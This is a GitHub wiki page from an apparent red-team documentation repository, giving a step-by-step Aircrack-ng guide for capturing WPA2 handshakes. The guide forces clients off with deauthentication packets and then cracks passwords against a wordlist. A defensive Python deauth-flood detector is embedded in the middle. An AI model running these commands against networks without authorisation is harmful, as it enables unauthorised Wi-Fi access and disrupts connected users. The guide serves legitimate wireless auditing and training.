Aircrack-ng - ikenpachi/Wireless-Attacks-Docs-Red-Team GitHub Wiki

Aircrack-ng – Complete Guide

Introduction

Aircrack-ng is a suite of tools for wireless network auditing. It allows you to capture packets, analyze traffic, and crack Wi-Fi passwords protected by WEP, WPA, and WPA2.


Installation

Linux (Debian/Ubuntu)

sudo apt update && sudo apt install aircrack-ng -y

Arch Linux

sudo pacman -S aircrack-ng

macOS (Homebrew)

brew install aircrack-ng

Windows

Download the official binary: https://www.aircrack-ng.org/downloads.html


Main Commands

1. List Wireless Interfaces

Before starting an attack, we need to identify available interfaces:

airmon-ng

2. Enable Monitor Mode

Monitor mode allows you to capture Wi-Fi packets without connecting to a network:

airmon-ng start wlan0

Note: Replace wlan0 with the name of your interface.

3. Capture Wi-Fi Packets

To identify nearby networks and capture packets:

airodump-ng wlan0mon

Explanation:

  • wlan0mon → Wi-Fi interface in monitor mode.
  • Displays SSID, BSSID, channels, encryption, and connected devices.

4. Capture WPA2 Handshake

  1. Choose a target and capture packets:

    airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0mon

    🔹 Example:

    airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

    • -c 6 → Wi-Fi channel.
    • --bssid AA:BB:CC:DD:EE:FF → Target router MAC address.
    • -w capture → Save packets to capture.cap.

  2. Force a device to reconnect (capture handshake faster):

    aireplay-ng -0 5 -a [BSSID] -c [CLIENT_MAC] wlan0mon

    🔹 Example:

    aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

    • -0 5 → Sends 5 deauthentication packets.
    • -a → BSSID of the target router.
    • -c → MAC address of the connected client.

  3. Check if the handshake was captured:

    aircrack-ng capture.cap

    If you see [ WPA handshake: AA:BB:CC:DD:EE:FF ], the handshake was captured. ✅
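The deauthentication frames that step 2 injects are unauthenticated management frames (unless the network enforces 802.11w Protected Management Frames), so a monitor-mode sensor can spot the burst by counting deauth/disassoc frames per BSSID. The Python below is an added defender-side example, not part of this wiki: it parses raw 802.11 management headers (no radiotap header assumed) and raises an alert on a burst; the MAC addresses, frames, window and threshold are constructed values.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 0x0C, 0x0A, 0x08   # 802.11 management subtypes

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame):
    """Return (subtype, addr1, addr2, bssid, reason) for a version-0 management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if version != 0 or ftype != 0:          # type 0 = management; data/control frames are ignored
        return None
    reason = struct.unpack_from("<H", frame, 24)[0] if len(frame) >= 26 else None
    return subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason

def detect_deauth_flood(frames, window=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_80211_bytes), in time order.
    Raises one alert per BSSID once `threshold` deauth/disassoc frames claiming that
    BSSID arrive within `window` seconds (a legitimate AP rarely sends bursts of these)."""
    recent, flagged, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        subtype, dst, src, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:            # drop frames that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold and bssid not in flagged:
            flagged.add(bssid)
            alerts.append({"bssid": bssid, "target": dst, "count": len(q),
                           "first_ts": q[0], "last_ts": ts, "reason": reason})
    return alerts

def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Constructed test frame: frame control, duration, addr1-3, sequence control, body."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed sample capture (not from a real network): one beacon, then a 5-frame deauth burst
AP, CLIENT, BCAST = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566"), b"\xff" * 6
SAMPLE_CAPTURE = [(1.0, build_mgmt(BEACON, BCAST, AP, AP))]
SAMPLE_CAPTURE += [(2.0 + i * 0.1, build_mgmt(DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)))
                   for i in range(5)]
```

Feeding real frames requires stripping the capture's radiotap header first; a single alert per BSSID with the targeted client and reason code is enough to correlate against the AP's own logs and decide whether PMF should be enforced.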

5. Crack WPA/WPA2 Password

After capturing the handshake, we use a password dictionary to try to crack the password:

aircrack-ng -w wordlist.txt -b [BSSID] capture.cap

🔹 Example:

aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap

Note: The cracking time depends on the password complexity and the dictionary used.
References